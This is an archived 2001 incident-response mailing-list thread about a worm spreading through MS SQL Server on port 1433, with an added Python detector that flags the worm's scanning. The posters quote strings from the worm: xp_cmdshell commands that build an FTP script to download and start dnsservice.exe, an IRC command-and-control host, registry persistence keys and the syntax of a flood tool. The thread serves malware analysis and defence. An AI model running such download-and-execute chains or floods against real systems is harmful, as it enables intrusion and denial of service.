Apparently the file is no longer available on the ftp server. Hopefully this worm is short-lived.

Arthur Donkers wrote:

> Hi All,
>
> Analysed it a bit further (thanks to VMware and netmonitor) and once it is started it connects to an IRC server at bots.kujikiri.net, port 6669. From the rest of the capture it seems it drops a message there with the name of the machine it compromised and a password-like string.
>
> It furthermore (see strings output on executable, scan for registry keys) adds itself to the Run entry in the registry so it is started each time the machine is booted. A few of the registry keys:
>
> SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TaskReg
> SOFTWARE\Microsoft\MSSQLServer\Client\SuperSocketNetLib\ProtocolOrder
> SOFTWARE\Microsoft\MSSQLServer\Client\ConnectTo\DSQUERY
>
> From the strings output it seems to contain a scanner (sm6 ..) that will scan for new vulnerable machines. I'm not quite sure if, and if so, how, it is controlled from the IRC channel. I've tested it on our testing network so I'm not quite sure yet.
>
> I've attached the netmon capture file to this message.
>
> grtz,
>
> Arthur
>
> On Tue, 20 Nov 2001, Paul Nasrat wrote:
>
>> On Tue, Nov 20, 2001 at 09:54:18AM -0500, Douglas P. Brown wrote:
>>
>>> We saw a scan come in looking for systems answering on 1433, and immediately saw several systems start scanning out for other systems answering on 1433 - worm behavior? Has anyone else seen this?
>>
>> No, but the binaries it downloads:
>>
>> win32mon.exe and dnsservice.exe
>>
>> Are on the ftp site in the dump.
>> I don't have a windows debugger to put them through but they look interesting:
>>
>> exec xp_cmdshell 'start dnsservice.exe'
>> exec xp_cmdshell 'del ftp.x'
>> exec xp_cmdshell 'ftp -s:ftp.x
>> exec xp_cmdshell 'echo quit >> ftp.x'
>> exec xp_cmdshell 'echo close >> ftp.x'
>> exec xp_cmdshell 'echo get dnsservice.exe>> ftp.x'
>> exec xp_cmdshell 'echo cd tmp>> ftp.x'
>> exec xp_cmdshell 'echo cd pub>> ftp.x'
>> exec xp_cmdshell 'echo bin>> ftp.x'
>> exec xp_cmdshell 'echo foo.com>> ftp.x'
>> exec xp_cmdshell 'echo ftp> ftp.x'
>>
>> GET /%s HTTP/1.0
>> Connection: Keep-Alive
>> User-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)
>> [GET] - Unable to connect to http.
>> [GET] - Unable to resolve host.
>> http://
>> [GET] - Unable to create new socket.
>> GET <bot|wildcard> <host> <save as>
>> %s %s %s %s
>> NOTICE %s :Voyager Alpha Force: Age of Kaiten (now with blitz-fu)
>> NICK %s
>> NOTICE %s :Nick cannot be larger than 9 characters.
>> NOTICE %s :NICK <nick>
>> sm6 has finished...
>> with tcp/syn boost!
>> sm6 icmp/udp has begun...
>> sm6 icmp/udp (w/pkt-push!) has begun..
>> Syntax: sm6 <wildcard|botname> <dest> <-n timelength> [-d delay] [-s src port] [-p dst port] [-rR random src/all ports] [-z random src ips] [-t include tcp/syn] [-z randomize src ips] [-S pkt size] -b <bcast file>
>>
>> etc.
>>
>> Paul Nasrat
>>
>> ----------------------------------------------------------------------------
>> This list is provided by the SecurityFocus ARIS analyzer service.
>> For more information on this free incident handling, management
>> and tracking system please see: http://aris.securityfocus.com
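The "worm behavior" Douglas Brown describes (a host is probed on tcp/1433 and shortly afterwards starts probing tcp/1433 on other hosts itself) can be pulled out of an ordinary connection log mechanically. The script below is an added example written for this archive page; it is not code from the thread, from any of the posters, or from the worm. It runs over a constructed sample log (the addresses, timestamps, 10-minute window and 5-target threshold are assumptions, not observations from the thread), flags hosts that contact several distinct 1433 targets soon after their first inbound 1433 hit, and notes any outbound connection on tcp/6669, the IRC port Arthur Donkers saw the bot use, as a secondary indicator.

```python
"""Flag hosts that start scanning tcp/1433 shortly after being hit on tcp/1433.

Added example for the thread above; not code from the posters or the worm.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample connection log (NOT taken from the thread): one line per
# new TCP connection, "ISO-timestamp src dst dport".  10.1.1.5 gets probed on
# 1433 from outside, fans out to 1433 on six other hosts, then calls out on
# tcp/6669.  10.1.1.9 is a legitimate client that only ever talks to 10.1.1.5.
SAMPLE_LOG = """\
2001-11-20T09:40:01 192.0.2.77 10.1.1.5 1433
2001-11-20T09:40:02 10.1.1.9 10.1.1.5 1433
2001-11-20T09:40:05 10.1.1.5 10.1.1.6 1433
2001-11-20T09:40:05 10.1.1.5 10.1.1.7 1433
2001-11-20T09:40:06 10.1.1.5 10.1.1.8 1433
2001-11-20T09:40:06 10.1.1.5 10.2.0.1 1433
2001-11-20T09:40:07 10.1.1.5 10.2.0.2 1433
2001-11-20T09:40:07 10.1.1.5 10.2.0.3 1433
2001-11-20T09:41:00 10.1.1.5 198.51.100.3 6669
2001-11-20T09:55:00 10.1.1.9 10.1.1.5 1433
"""


def parse_log(text):
    """Parse the four-column log into (timestamp, src, dst, dport) tuples."""
    flows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, dport = line.split()
        flows.append((datetime.fromisoformat(ts), src, dst, int(dport)))
    return flows


def find_worm_like_hosts(flows, sql_port=1433, irc_port=6669,
                         window=timedelta(minutes=10), min_targets=5):
    """Return {host: details} for hosts that, within `window` of their first
    inbound connection on `sql_port`, open connections to at least
    `min_targets` distinct hosts on `sql_port`.  Outbound connections on
    `irc_port` in the same window are reported as a secondary indicator.
    The window and threshold are assumed values, not measurements."""
    first_inbound = {}            # victim -> (timestamp, source that hit it)
    outbound = defaultdict(list)  # src -> [(timestamp, dst, dport)]
    for ts, src, dst, dport in sorted(flows):
        if dport == sql_port and dst not in first_inbound:
            first_inbound[dst] = (ts, src)
        outbound[src].append((ts, dst, dport))

    hits = {}
    for host, (hit_ts, attacker) in first_inbound.items():
        deadline = hit_ts + window
        # Everything this host opened between being hit and the window end.
        later = [(ts, dst, dport) for ts, dst, dport in outbound[host]
                 if hit_ts <= ts <= deadline]
        targets = sorted({dst for _, dst, dport in later if dport == sql_port})
        if len(targets) < min_targets:
            continue
        hits[host] = {
            "infected_from": attacker,
            "at": hit_ts,
            "targets": targets,
            "irc_c2": sorted({dst for _, dst, dport in later if dport == irc_port}),
        }
    return hits


if __name__ == "__main__":
    for host, info in find_worm_like_hosts(parse_log(SAMPLE_LOG)).items():
        print(f"{host}: hit from {info['infected_from']} at {info['at']}, "
              f"then scanned {len(info['targets'])} hosts on 1433; "
              f"IRC-port peers: {info['irc_c2'] or 'none'}")
```

On the sample log only 10.1.1.5 is reported: it was hit from 192.0.2.77 and then opened 1433 to six distinct hosts inside the window, with one outbound connection to tcp/6669. The legitimate client 10.1.1.9 is never flagged because it only ever talks to one SQL server, which is why counting distinct destinations rather than raw connection volume keeps ordinary clients out of the result; tune `min_targets` and `window` to your own network's fan-out.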
This archive was generated by hypermail 2b30 : Tue Nov 20 2001 - 11:02:21 PST